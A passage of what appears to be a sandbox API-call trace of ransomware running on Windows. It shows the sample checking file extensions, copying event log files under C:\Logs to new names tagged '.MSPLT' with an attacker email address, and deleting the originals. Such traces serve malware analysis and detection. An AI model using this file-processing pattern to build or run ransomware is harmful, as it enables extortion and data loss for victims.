[0291.760] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".xls") returned 4 [0291.760] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".xlsx") returned 5 [0291.760] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.760] lstrlenW (lpString=".ppt") returned 4 [0291.760] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.760] lstrlenW (lpString=".zip") returned 4 [0291.760] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".rar") returned 4 [0291.760] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".bz2") returned 4 [0291.760] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".7z") returned 3 [0291.760] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.760] lstrlenW (lpString=".dbf") returned 4 [0291.760] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.760] lstrlenW (lpString=".1cd") returned 4 [0291.760] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.760] lstrlenW (lpString=".jpg") returned 4 [0291.761] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.761] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.761] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 47 [0291.761] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0291.787] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0291.787] CloseHandle (hObject=0x454) returned 1 [0291.788] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 0x20 [0291.788] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0291.788] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.788] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.795] GetLastError () returned 0x0 [0291.795] ReadFile (in: hFile=0x454, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.810] WriteFile (in: hFile=0x440, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.813] ReadFile (in: hFile=0x454, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0291.813] WriteFile (in: hFile=0x440, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x132, lpOverlapped=0x0) returned 1 [0291.813] SetEndOfFile (hFile=0x440) returned 1 [0291.829] CloseHandle (hObject=0x440) returned 1 [0291.847] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.847] SetEndOfFile (hFile=0x454) returned 1 [0292.125] CloseHandle (hObject=0x454) returned 1 [0292.125] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.125] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 1 [0292.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.206] lstrlenW (lpString=".doc") returned 4 [0292.206] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString=".docx") returned 5 [0292.206] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.206] lstrlenW (lpString=".pdf") returned 4 [0292.206] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString=".xls") returned 4 [0292.206] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString=".xlsx") returned 5 [0292.206] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.206] lstrlenW (lpString=".ppt") returned 4 [0292.206] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.206] lstrlenW (lpString=".zip") returned 4 [0292.206] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString=".rar") returned 4 [0292.206] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.206] lstrlenW (lpString=".bz2") returned 4 [0292.207] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString=".7z") returned 3 [0292.207] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.207] lstrlenW (lpString=".dbf") returned 4 [0292.207] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.207] lstrlenW (lpString=".1cd") returned 4 [0292.207] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.207] lstrlenW (lpString=".jpg") returned 4 [0292.207] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.207] lstrlenW (lpString=".doc") returned 4 [0292.207] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString=".docx") returned 5 [0292.207] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.207] lstrlenW (lpString=".pdf") returned 4 [0292.207] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString=".xls") returned 4 [0292.207] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString=".xlsx") returned 5 [0292.207] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.207] lstrlenW (lpString=".ppt") returned 4 [0292.207] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.207] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.208] lstrlenW (lpString=".zip") returned 4 [0292.208] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.208] lstrlenW (lpString=".rar") returned 4 [0292.208] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.208] lstrlenW (lpString=".bz2") returned 4 [0292.208] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.208] lstrlenW (lpString=".7z") returned 3 [0292.208] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.208] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.208] lstrlenW (lpString=".dbf") returned 4 [0292.208] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.208] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.208] lstrlenW (lpString=".1cd") returned 4 [0292.208] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.208] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0292.208] lstrlenW (lpString=".jpg") returned 4 [0292.208] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.208] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.208] lstrlenW (lpString="Microsoft-Windows-NCSI%4Operational.evtx") returned 40 [0292.208] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.475] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0292.475] CloseHandle (hObject=0x37c) returned 1 [0292.475] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 0x20 [0292.491] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.491] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0292.491] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.491] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.491] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0292.492] GetLastError () returned 0x0 [0292.492] ReadFile (in: hFile=0x45c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.620] WriteFile (in: hFile=0x448, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.622] ReadFile (in: hFile=0x45c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0292.622] WriteFile (in: hFile=0x448, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x124, lpOverlapped=0x0) returned 1 [0292.623] SetEndOfFile (hFile=0x448) returned 1 [0292.629] CloseHandle (hObject=0x448) returned 1 [0292.637] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.637] SetEndOfFile (hFile=0x45c) returned 1 [0292.639] CloseHandle (hObject=0x45c) returned 1 [0292.640] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.640] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 1 [0292.694] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.694] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.694] lstrlenW (lpString=".doc") returned 4 [0292.694] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.694] lstrlenW (lpString=".docx") returned 5 [0292.695] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.695] lstrlenW (lpString=".pdf") returned 4 [0292.695] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString=".xls") returned 4 [0292.695] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString=".xlsx") returned 5 [0292.695] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.695] lstrlenW (lpString=".ppt") returned 4 [0292.695] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.695] lstrlenW (lpString=".zip") returned 4 [0292.695] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString=".rar") returned 4 [0292.695] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString=".bz2") returned 4 [0292.695] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString=".7z") returned 3 [0292.695] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.695] lstrlenW (lpString=".dbf") returned 4 [0292.695] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.695] lstrlenW (lpString=".1cd") returned 4 [0292.695] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.695] lstrlenW (lpString=".jpg") returned 4 [0292.696] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.696] lstrlenW (lpString=".doc") returned 4 [0292.696] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".docx") returned 5 [0292.696] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.696] lstrlenW (lpString=".pdf") returned 4 [0292.696] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".xls") returned 4 [0292.696] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".xlsx") returned 5 [0292.696] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.696] lstrlenW (lpString=".ppt") returned 4 [0292.696] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.696] lstrlenW (lpString=".zip") returned 4 [0292.696] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".rar") returned 4 [0292.696] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".bz2") returned 4 [0292.696] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.696] lstrlenW (lpString=".7z") returned 3 [0292.696] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.697] lstrlenW (lpString=".dbf") returned 4 [0292.697] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.697] lstrlenW (lpString=".1cd") returned 4 [0292.697] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.697] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0292.697] lstrlenW (lpString=".jpg") returned 4 [0292.697] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.697] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.697] lstrlenW (lpString="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 74 [0292.697] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0292.752] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0292.753] CloseHandle (hObject=0x488) returned 1 [0292.753] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 0x20 [0292.753] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.753] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0292.753] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.753] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.753] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0292.769] GetLastError () returned 0x0 [0292.769] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.776] WriteFile (in: hFile=0x48c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.779] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0292.779] WriteFile (in: hFile=0x48c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x168, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x168, lpOverlapped=0x0) returned 1 [0292.779] SetEndOfFile (hFile=0x48c) returned 1 [0292.780] CloseHandle (hObject=0x48c) returned 1 [0293.180] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.180] SetEndOfFile (hFile=0x488) returned 1 [0293.181] CloseHandle (hObject=0x488) returned 1 [0293.182] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.182] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 1 [0293.182] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.183] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.183] lstrlenW (lpString=".doc") returned 4 [0293.183] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".docx") returned 5 [0293.183] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.183] lstrlenW (lpString=".pdf") returned 4 [0293.183] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".xls") returned 4 [0293.183] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".xlsx") returned 5 [0293.183] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.183] lstrlenW (lpString=".ppt") returned 4 [0293.183] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.183] lstrlenW (lpString=".zip") returned 4 [0293.183] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".rar") returned 4 [0293.183] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".bz2") returned 4 [0293.183] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.183] lstrlenW (lpString=".7z") returned 3 [0293.184] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.184] lstrlenW (lpString=".dbf") returned 4 [0293.184] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.184] lstrlenW (lpString=".1cd") returned 4 [0293.184] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.184] lstrlenW (lpString=".jpg") returned 4 [0293.184] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.184] lstrlenW (lpString=".doc") returned 4 [0293.184] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString=".docx") returned 5 [0293.184] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.184] lstrlenW (lpString=".pdf") returned 4 [0293.184] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString=".xls") returned 4 [0293.184] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.184] lstrlenW (lpString=".xlsx") returned 5 [0293.184] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.185] lstrlenW (lpString=".ppt") returned 4 [0293.185] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.185] lstrlenW (lpString=".zip") returned 4 [0293.185] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.185] lstrlenW (lpString=".rar") returned 4 [0293.185] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.185] lstrlenW (lpString=".bz2") returned 4 [0293.185] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.185] lstrlenW (lpString=".7z") returned 3 [0293.185] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.185] lstrlenW (lpString=".dbf") returned 4 [0293.185] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.185] lstrlenW 